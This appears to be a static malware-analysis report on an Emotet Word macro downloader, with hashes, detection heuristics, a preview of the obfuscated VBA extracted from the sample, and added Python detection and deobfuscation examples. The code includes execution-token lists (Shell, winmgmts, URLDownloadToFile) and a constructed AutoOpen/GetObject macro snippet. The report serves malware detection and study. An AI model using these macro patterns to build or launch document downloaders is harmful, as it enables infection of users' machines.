Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a78e540b04b64ba9…

MALICIOUS

Office (OLE)

Size: 225.8 KB
Created: 2019-02-25 12:05:00 (taken from the document's own metadata, so attacker-controlled; not an observation time)
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: b91cbf3223fa0f7e22cc161832711047
SHA-1: 17ea3a97e34f787d846a2d8b30a26f59bf34eb70
SHA-256: a78e540b04b64ba96387753e0529a1fac9d8aa24a0bda913ca91ca67fb6ecd70
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the file with the signature Doc.Downloader.Emotet-6899208-0, which ties it to the Emotet family with high confidence. The high-severity heuristics establish the execution chain: the document carries a VBA project with an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled, and that procedure calls GetObject, the automation call that malicious macros typically use to obtain an object such as the WMI service or a script host and start a child process outside Word. The extracted source (macros.bas under Extracted artifacts) is heavily obfuscated: randomly named variables and long runs of Select Case blocks which, in the visible preview, are keyed on variables that are never assigned, so their bodies never execute and only pad out the real logic. This is consistent with the macro's primary function being to download and execute a second-stage payload. Only the loader stage is visible here; the download destination does not appear in the URL extraction (the single URL recovered is the DrawingML XML namespace from the document body), so the target is presumably assembled at run time by the obfuscated code.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6899208-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6899208-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat for this sample: a modern VBA project was in fact recovered (macros.bas under Extracted artifacts, via olevba), so the rule's "no modern VBA project was recovered" condition does not describe this file, and the marker is the same AutoOpen name already reported by OLE_VBA_AUTOOPEN. Treat this finding as redundant with that one, not as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace URI that Office writes into any document containing a drawing object. It is never contacted at run time and is not the payload's download location; do not block or pivot on it.
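The OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ and OLE_VBA_PCODE_AUTOEXEC_EXEC findings above all reduce to one check: an auto-execution entry point appearing together with an execution token, whether in decoded source or in a compiled module stream where source extraction failed. The following Python is an added example written for this page, not the analysis platform's or oletools' own code. It scans a module as bytes and assumes that identifier names survive as single-byte text in the compiled stream (that is why a p-code-only document still trips the rule); the three inputs it scans are constructed here and are not taken from the analysed sample.

```python
import re
from dataclasses import dataclass

# Entry points Word/Excel run without user interaction (the OLE_VBA_AUTOOPEN class).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Document_Close", "Auto_Open", "Workbook_Open")
# Calls and objects that hand control to something outside the document
# (the shell/download/object-execution class; GetObject is the one flagged above).
EXEC_TOKENS = ("GetObject", "CreateObject", "Shell", "WScript.Shell", "winmgmts",
               "Win32_Process", "URLDownloadToFile", "ShellExecute")


def _token_pattern(tokens):
    # Whole-identifier match, case-insensitive: VBA identifiers are case-insensitive,
    # and a raw module stream has binary bytes, not whitespace, around each name.
    alts = "|".join(re.escape(t) for t in tokens)
    return re.compile(r"(?<![A-Za-z0-9_])(?:%s)(?![A-Za-z0-9_])" % alts, re.I)


AUTOEXEC_RE = _token_pattern(AUTOEXEC_TOKENS)
EXEC_RE = _token_pattern(EXEC_TOKENS)


@dataclass(frozen=True)
class MacroVerdict:
    autoexec: tuple   # auto-execution tokens found
    execution: tuple  # execution tokens found

    @property
    def triggered(self) -> bool:
        # The high-severity rule needs BOTH classes, as OLE_VBA_PCODE_AUTOEXEC_EXEC states.
        return bool(self.autoexec) and bool(self.execution)


def scan_macro(data: bytes) -> MacroVerdict:
    """Scan decoded VBA source or a raw module stream for the two token classes.
    Assumption: identifier names survive as single-byte text in the compiled stream,
    so latin-1 decoding keeps them findable when no source was recovered."""
    text = data.decode("latin-1")

    def found(rx):
        return tuple(sorted({m.group(0) for m in rx.finditer(text)}, key=str.lower))

    return MacroVerdict(found(AUTOEXEC_RE), found(EXEC_RE))


def severity(v: MacroVerdict) -> str:
    """Map a verdict onto the page's levels: high only when both classes co-occur."""
    if v.triggered:
        return "high"
    if v.autoexec or v.execution:
        return "medium"
    return "none"


# Constructed samples (not taken from the analysed document).
# 1. Decoded source with an AutoOpen entry point that calls GetObject.
SOURCE_SAMPLE = b"""Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    On Error Resume Next
    Set svc = GetObject("winmgmts:")
    ' remainder of the loader omitted; not needed for the heuristic
End Sub
"""
# 2. Stand-in for a compiled module stream with the source stripped: the identifier
#    names are still present as plain text between binary bytes.
PCODE_SAMPLE = (b"\x01\x16\x03\x00AutoOpen\x00\x00\x08\x00GetObject\x00\x02"
                b"\x10winmgmts:\x00")
# 3. An AutoOpen macro that only formats text: entry point but no execution token.
BENIGN_SAMPLE = b"""Sub AutoOpen()
    ActiveDocument.Range.Font.Name = "Calibri"
End Sub
"""

if __name__ == "__main__":
    for name, blob in (("source", SOURCE_SAMPLE), ("p-code", PCODE_SAMPLE),
                       ("benign", BENIGN_SAMPLE)):
        v = scan_macro(blob)
        print(f"{name:7} severity={severity(v):6} autoexec={v.autoexec} "
              f"execution={v.execution}")
```

The third sample is the reason the rule is written as a conjunction: an AutoOpen procedure on its own is the medium-severity OLE_VBA_MACROS/AUTOOPEN tier, and only the co-occurrence with GetObject, Shell or a download API earns the high tier. Feed it the `macros.bas` carved below, or the raw module stream from `vbaProject.bin`, and the same verdict comes back either way.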

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 48121 bytes
SHA-256: a48a00b115e429245687d443939482337a7bd6c9f05ec30f6a4f6ceedd1d9174
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "c_52__"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "i14_483_"
Function a8_00_5()
   Select Case z681768
         Case 319945781
            H34064 = f_86_300
            E6__29_3 = k_5__064
            j_04__3 = Sgn(636137071 * Round(413265609))
         Case 329739676
            a0409510 = ChrB(938968997)
            Z_0909 = Sgn(309701051)
            m537_72 = C_09_70
End Select
   Select Case m58_5___
         Case 28904041
            j___587 = P_8_2641
            H9_120 = V8__0225
            R14_42__ = Sgn(815292308 * Round(838961137))
         Case 781167492
            r____0_ = ChrB(658848697)
            f_02846 = Sgn(547683839)
            d___36_ = q_28__
End Select
   Select Case K3_3__51
         Case 766290271
            N3_79___ = j__7131
            q7641_34 = z7__34_2
            Q_7_59 = Sgn(416253355 * Round(48864305))
         Case 746249419
            N0_37___ = ChrB(716723002)
            Z__2_10 = Sgn(216925156)
            f291_9 = P2783__
End Select
   Select Case v9__9__
         Case 137773687
            k928___9 = A5__3__
            Z19_31_ = w991__49
            k2131579 = Sgn(698254209 * Round(113233807))
         Case 504451595
            q___3__8 = ChrB(86460846)
            i2__9_ = Sgn(616167620)
            F547_88 = G1469_5
End Select
   Select Case Y_45589_
         Case 447360223
            c_98_5 = R644_16
            t88__7_3 = V28_5__
            t_67_7 = Sgn(578276451 * Round(488593882))
         Case 225488329
            O_10__ = ChrB(270278837)
            Y_5__36_ = Sgn(671905066)
            N459481 = K_89027
End Select
   Select Case X64508
         Case 790874376
            E_3____ = b_023_09
            v___9_2 = W18__429
            c688855 = Sgn(503056318 * Round(374938060))
         Case 177050382
            E32773_9 = ChrB(122992767)
            s__11__ = Sgn(115703765)
            B_57789 = l6___5
End Select
   Select Case Z1_72__
         Case 75873386
            i_1_85__ = O697261
            j__741__ = k___2_0
            q45_9_4 = Sgn(106767341 * Round(505991055))
         Case 290930503
            n752__6_ = ChrB(740510003)
            A55_5_7 = Sgn(765272832)
            j89725 = w3_7__9_
End Select
   Select Case Z9_54_4
         Case 979358561
            R_0_046 = U96_598
            a803_9_6 = U84_6_
            b__04_ = Sgn(375948527 * Round(876779563))
         Case 802284817
            i__0688_ = ChrB(160504530)
            D533_1 = Sgn(167635146)
            C35_51_4 = F_88770_
End Select
   Select Case h_23__
         Case 300992782
            U42_59 = q224_5_3
            o50_18_8 = T___051
            E_68__ = Sgn(862171964 * Round(516477466))
         Case 918496625
            K__18_9 = ChrB(616574147)
            n_7_726 = Sgn(172101187)
            P0__17_ = J_1__4
End Select
End Function
Function d_77__(O086632, U__61_5_)
On Error Resume Next
   Select Case W_9__1
         Case 45352913
            Z97606 = X_336521
            O_6_1930 = N_1__731
            w_8_555 = Sgn(88209831 * Round(47247938))
         Case 714878256
            w2____9_ = ChrB(235753172)
            l_9_44 = Sgn(938570394)
            B7_540 = L29976__
End Select
   Select Case f3973068
         Case 690358527
            C___0_7 = v80_9_
            H_42620 = b_51__
            C59_80_ = Sgn(523963968 * Round(636132264))
         Case 941946358
            u_3__6_ = ChrB(916806263)
            o58967_1 = Sgn(918060135)
            G8050_ = f_38_4
End Select
   Select Case w4_26_8_
         Case 592531615
            P_____38 = v____7
            u563_569 = F7435__7
            n_4___ = Sgn(61020864 * Round(357924549))
         Case 986929124
            a_2_582 = ChrB(789609988)
           
... (truncated)
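The preview above is almost entirely padding: every Select Case in it is keyed on a variable that is never assigned anywhere, so the selector evaluates to Empty at run time, no numeric Case label ever matches, and the body is dead. The following Python is an added example, not code from the page's tooling or from the sample itself. It removes such blocks from decoded VBA source, iterating to a fixpoint because a dropped body may have been the only assignment feeding a later selector; blocks keyed on procedure parameters or on assigned variables are kept. The input macro is constructed to mimic the shape of the extract and is not the real macros.bas.

```python
import re

# Line shapes of a decoded VBA module that the stripper needs to recognise.
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+(\S+)\s*$", re.I)
END_SELECT_RE = re.compile(r"^\s*End\s+Select\s*$", re.I)
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Places a name can receive a value: plain/Set/For assignment, declarations, parameters.
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+|For\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=", re.I)
DECL_RE = re.compile(r"^\s*(?:Dim|ReDim|Const|Private|Public|Static)\s+([A-Za-z_][A-Za-z0-9_]*)", re.I)
PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Function|Sub)\s+\w+\s*\(([^)]*)\)", re.I)


def assigned_names(lines):
    """Lower-cased set of every identifier that can hold a value somewhere in the module."""
    names = set()
    for line in lines:
        for rx in (ASSIGN_RE, DECL_RE):
            m = rx.match(line)
            if m:
                names.add(m.group(1).lower())
        m = PROC_RE.match(line)
        if m:
            for param in m.group(1).split(","):
                param = re.sub(r"^\s*(?:Optional\s+)?(?:ByVal\s+|ByRef\s+)?", "", param, flags=re.I).strip()
                if param:
                    names.add(param.split()[0].lower())   # drop any "As Type"
    return names


def strip_dead_selects(src: str) -> str:
    """Remove Select Case blocks whose selector is a bare identifier that is never assigned.
    Such a selector is Empty at run time, so no Case label matches and the body is dead.
    Repeats until nothing is removed, because a removed body may have been the only
    assignment feeding another selector. Expression selectors are left alone."""
    lines = src.splitlines()
    while True:
        known = assigned_names(lines)
        kept, removed, i = [], 0, 0
        while i < len(lines):
            m = SELECT_RE.match(lines[i])
            if m and IDENT_RE.match(m.group(1)) and m.group(1).lower() not in known:
                depth, j = 1, i + 1
                while j < len(lines) and depth:          # find the matching End Select
                    if SELECT_RE.match(lines[j]):
                        depth += 1
                    elif END_SELECT_RE.match(lines[j]):
                        depth -= 1
                    j += 1
                if depth == 0:                           # well-formed block: drop i..j-1
                    removed += 1
                    i = j
                    continue
            kept.append(lines[i])
            i += 1
        lines = kept
        if not removed:
            return "\n".join(lines) + "\n"


# Constructed input in the shape of the extract above (not the real macros.bas):
# two junk blocks keyed on never-assigned names, one live block keyed on a parameter.
SAMPLE = """Attribute VB_Name = "i14_483_"
Function d_77__(O086632, U__61_5_)
On Error Resume Next
   Select Case W_9__1
         Case 45352913
            Z97606 = X_336521
            w_8_555 = Sgn(88209831 * Round(47247938))
         Case 714878256
            w2____9_ = ChrB(235753172)
End Select
   Select Case f3973068
         Case 690358527
            C___0_7 = v80_9_
End Select
   Select Case O086632
         Case 1
            d_77__ = U__61_5_
         Case Else
            d_77__ = O086632 & U__61_5_
End Select
End Function
Sub AutoOpen()
   t = d_77__(2, "x")
End Sub
"""

if __name__ == "__main__":
    print(strip_dead_selects(SAMPLE))
```

Run against the carved macros.bas, what survives is the code that actually builds and launches the payload, which is the part worth reading. The pass is deliberately conservative: a selector assigned through a line shape the regexes do not recognise is kept, never dropped, so a false negative costs a little reading time rather than a lost step of the chain.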